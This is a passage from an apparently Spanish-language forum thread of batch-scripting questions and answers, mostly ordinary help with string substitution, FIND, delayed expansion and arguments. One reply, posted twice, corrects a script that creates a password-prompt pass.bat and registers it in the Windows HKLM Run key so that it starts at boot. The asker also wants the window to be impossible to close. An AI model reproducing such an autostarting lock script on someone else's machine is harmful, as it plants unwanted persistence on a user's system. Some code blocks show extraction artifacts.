name-tmp-10.ppm
name-tmp-11.ppm
name-tmp-2.ppm
name-tmp-3.ppm
name-tmp-4.ppm
name-tmp-5.ppm
name-tmp-6.ppm
name-tmp-7.ppm
name-tmp-7.ppm
name-tmp-9.ppm
otro.cmd
C:\Users\leo\batch\temp>
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: pablgonz en 25 Noviembre 2011, 22:02

Gracias por la respuesta, ahora funciona al 100%.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Nefkofan en 21 Febrero 2012, 04:56

<u>Cita de: TxShack en 11 Julio 2007, 15:11</u> TxShack

bueno al parecer tienes unos pequeños errorcillos

- falta un echo en la sexta linea
- Debes agregar otro %% para que se imprima %clave%

Código:

```
@echo off
Rem yo lo probe en mi pc desde el escritorio eliminando esta linea
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo set/p clave= >> pass.bat
echo if %%clave%%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo cls >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
echo pause >> pass.bat
echo exit >> pass.bat
```

Rem esta linea tampoco la use el objetibo de la prueba era que pass.bat se ejecutara y lo logro exitosamente reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v pass.bat /t reg_sz /d C:\ /f
Rem yo use la linea start %cd%\pass.bat por practicidad al momento de realizar pruebas start c:\pass.bat exit[/code
Espero te sea de utilidad ;)

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Nefkofan en 21 Febrero 2012, 04:59

Cita de: TxShack en 11 Julio 2007, 15:11

Bueno, queria saber si me podriais ayudar con este batch

Lo que quiero es que se añada al registro run pero no consigo hacerlo... algo debo de acer malalgo.. pero no se que... ace muchisimo que no uso los batch, porq se me daban bien.. pero se me an olvidado cosas poco a poco y aora no me sale esto

El codigo que giero q salga es este:

Lo e estado intentando varias veces pero no lo consigo... e provado esto.. poro no funciona

Estare aciendo algo mal.. pero no se que... la cuestion es q no funciona..

Provadlo y vereis, y si me podeis ayudar os lo agradeceria ^^

bueno, y una ultima cosa... q tendria q añadirle para que quien lo ejecute no pueda dar a la X.. osea, q si intenta cerrar no pueda. Gracias

Un saludo

TxShack

<u>Cita de: TxShack en 11 Julio 2007, 15:11</u> TxShack

bueno al parecer tienes unos pequeños errorcillos

- falta un echo en la sexta linea
- Debes agregar otro %% para que se imprima %clave%

Código:

@echo off

Rem yo lo probe en mi pc desde el escritorio eliminando esta linea

```
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo set/p clave= >> pass.bat
echo if %%clave%%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo cls >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
echo pause >> pass.bat
echo exit >> pass.bat
Rem esta linea tampoco la use el objetibo de la prueba era que pass.bat
se ejecutara y lo logro exitosamente
reg add hkey local machine\software\microsoft\windows\currentversion\run
/v pass.bat /t reg sz /d C:\ /f
Rem yo use la linea start %cd%\pass.bat por practicidad al momento de
realizar pruebas
start c:\pass.bat
exit[/code
Espero te sea de utilidad ;)
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: polmadur en 25 Abril 2012, 12:20

hola buenas, veréis, soy bastante novatillo en batch aunque tengo conocimientos aceptables en python así que domino la programación un poco(aunque mi estilo sea pésimo, lo reconozco).

Esta es mi duda, tengo un archivo en excel donde hay muchos nombres en diferentes páginas, cada página es un servicio de la asociación. La pregunta es si para recorrer ese archivo en busca de algún nombre en concreto se necesita algo especial, me refiero a como es un formato de texto diferente, CSV no lo se.

Si no hace falta nada especial ya me pongo yo a crear el script de busqueda.

gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: EleKtro H@cker en 25 Abril 2012, 20:55

Cita de: polmadur en 25 Abril 2012, 12:20

La pregunta es si para recorrer ese archivo en busca de algún nombre en concreto se necesita algo especial, me refiero a como es un formato de texto diferente, CSV no lo se.

Si no hace falta nada especial ya me pongo yo a crear el script de busqueda.

No es necesario nada especial, Puedes usar el comando "FIND" y "FINDSTR" con todo archivo que contenga texto.

Código

```
    Find "PALABRA" "ARCHIVO.CSV"
    Findstr "PALABRA" "ARCHIVO.CSV"
    .
```

Saludos!

```
Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Bulone en 4 Junio 2012, 22:26
```

Hola, soy nuevo en este foro, quería saber si me podríais ayudar con el siguiente problema:

Estoy creando un programa en bat, el cual coge los valores de un .txt y necesito entre otras cosas que me cambie los valores que contengan un "=" (sin comillas) por el valor que queda detrás del caracter "=" (normalmente el caracter "=" no estará situado mas allá del 5 caracter) (no se si me explico bien)

```
Ej:
set var1=987u=543
```

(quiero que el resultado de var1 sea 543)

Ya he probado cosas del estilo: set var2=%var1:==x% (que me cambiase el igual por una x para trabajar mejor)

Código

```
    if "%var:~1,1%"=="=" set var=%var:~2%
    if "%var:~2,1%"=="=" set var=%var:~3%
```

```
3. if "%var:~3,1%"=="=" set var=%var:~4%
4. if "%var:~4,1%"=="=" set var=%var:~5%
5. if "%var:~5,1%"=="=" set var=%var:~6%
6. if "%var:~6,1%"=="=" set var=%var:~7%
7. if "%var:~7,1%"=="=" set var=%var:~8%
8. if "%var:~8,1%"=="=" set var=%var:~9%
```

(da error ya que reconoce el "=" como lectura del if)

(y otras tantas cosillas mas he probado también...) en definitiva si alguien me pudiese ayudar se lo agradecería, pues ya llevo varios días detrás de este problemilla. Si necesitais mas información sobre el problema, me decís.

Gracias de antemano.

NI caso al mensaje anterior, leyendo por ahí, encontré una solución al problema.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Aldorf en 19 Julio 2012, 06:41

Saludos a tod@s,

antes que nada, muy bueno el tuto, muchas gracias por compartir.

Ahora el mangazo: :silbar:

Tengo un problema al reemplazar parte del contenido de una variable, el problema surge por que lo que quiero poner contiene un "%". Basicamente es reemplazar el "@" de un correo por un "%40".

Tengo esto:

```
Código:
```

```
set correo=yo@gmail.com
set correo=%correo:@=%40%
```

Por supuesto que esto no funciono, ya que al encontrar el "%" despues del "=" asume que termino el reemplazo y simplemente me elimina el "@" agregandole al final el "40"

Intente con:

Código:

```
set correo=yo@gmail.com
set correo=%correo:@=%40%
...
set correo=%correo:@=%%40%
...
set correo=%correo:@=%%%40%
```

Sin poder lograrlo, tambien intente usando una variable auxiliar con el valor "%40" pero siempre lo mismo.

La solucion que me queda me parece muy trucha, es ir preguntando caracter por caracter si es el "@" y una vez encontrado crear una nueva variable concatenando lo anterior al "@" con el "%40" y lo posterior al "@"...

Pero la verdad me parece una solucion muy trucha, por eso pregunto a quien sabe para aprender mas y hacer las cosas mejor.

Ya me parece mas que trucho lo que hice para a una variable asignarle el contenido de otra variable cuyo nombre era el contenido de otra variable... (parece un trabalenguas, verdad?).

Código:

```
@echo on & setlocal enableextensions disabledelayedexpansion
call:CargaVariables
cls
set Respuesta=
echo 0 - Salir
echo 1 - %Jugador1%
echo 2 - %Jugador2%
echo 3 - %Jugador3%
set /p Respuesta=Selieccione su opcion:
set JugadorElejido=set JugadorElejido^=%%Jugador%Respuesta%%%
%JugadorElejido%
call:ProcesoPrincipal %JugadorElejido%
if (%errorlevel%) == (1) goto:eof
응()
goto:eof
:CargaVariables
set Jugador1=Jose
set Jugador2=Miguel
set Jugador3=Marcela
goto:eof
:ProcesoPrincipal
if (%1) == () echo. & echo Saliendo... & echo. & pause & set errorlevel=1 &
rem aca esta todo lo que hace en si el programa...
```

... goto:eof

Desde ya, muchas gracias por la ayuda.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Binary_Death en 19 Julio 2012, 06:46

Esto te debería funcionar:

Código:

@Echo Off
setlocal enabledelayedexpansion
set "correo=!correo:@=%%40!"
echo: %correo%
pause 1>nul
exit

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Aldorf en 23 Julio 2012, 15:22

Hola Binary_Death,

Muchas pero muchas gracias!, funciona perfecto ;-)
Veo que mi problema principal por el cual jamas me hubiera funcionado esta en la primer linea :-[

Citar

@echo on & setlocal enableextensions disabledelayedexpansion

Vos me enseñaste que el correcto para este caso es: Citar

@echo on & setlocal enableextensions enabledelayedexpansion

Una vez mas, muchas gracias! Saludos cordiales.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Binary_Death en 23 Julio 2012, 17:09

No hay de qué ;)

Puedes leerte esto para que te aclare dudas sobre setlocal: http://ss64.com/nt/delayedexpansion.html

iUn saludo!

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Aldorf en 23 Julio 2012, 18:14

Muy bueno el link, ahora tengo mas data para seguir probando, gracias! ;D

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: BatchianoISpyxolo en 23 Julio 2012, 23:58

Cita de: Aldorf en 23 Julio 2012, 18:14

Muy bueno el link, ahora tengo mas data para seguir probando, gracias! ;D

También estaría bien que buscaras algún tutorial sobre Nesting.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: AgnesBlack en 24 Julio 2012, 22:46

Cita de: BatchianoISpyxolo en 23 Julio 2012, 23:58

También estaría bien que buscaras algún tutorial sobre Nesting.

en bath tambien se puede hacer recursividad :o wuau genial

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: TheAguaplas en 6 Septiembre 2012, 16:22

Lo siento por molestar :silbar: es una cosa simple no "Programación

BATCH Avanzada"

Este código no me va: :huh:

move "123*" "456*"

Estaba haciendo un .bat y solo por eso no me funcionaba

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: EleKtro H@cker en 6 Septiembre 2012, 16:37

Cita de: TheAguaplas en 6 Septiembre 2012, 16:22

```
Este código no me va: :huh: move "123\*" "456\*"
```

El uso del comodín * indica que el comando afecta a todos los archivos dentro de la carpeta " 123 ", Entonces se mueven todos, Pero no puedes moverlos a la carpeta " 4566*todos* ", no se si me entiendes, ahí sobra el comodín.

Déjalo así: Código

```
1. move "123\*" "456\"
```

Saludos.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: elpeluca en 13 Septiembre 2012, 00:33

Muy buenas.

He estado viendo el tutorial y esta muy bien, pero no entiendo los argumentos.

El %0 sí me sale pero el resto no lo entiendo :-[. ¿Me podrian dar una pequeña ayudita? :huh:

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: EleKtro H@cker en 13 Septiembre 2012, 01:25

<u>Cita de: elpeluca en 13 Septiembre 2012, 00:33</u> ¿Me podrian dar una pequeña ayudita? :huh:

Código

```
1. @Echo OFF
2.
3. Call :elhacker pim pam toma lacasitos!! yea!
4. pause >NUL & Exit
5.
6. :elhacker
7. Echo La Etiqueta: %0 | MORE
8. Echo Argumentos: %* | MORE
9. Echo Argumento 1: %1
10. Echo Argumento 2: %2
11. Echo Argumento 3: %3
```

```
12. <u>Echo</u> Argumento 4: %4
13. <u>Echo</u> Argumento 5: %5
14. <u>Goto</u>:EOF
```

(http://img16.imageshack.us/img16/6416/prtscrcapturee.jpg)

Espero que te sirva un poco saludos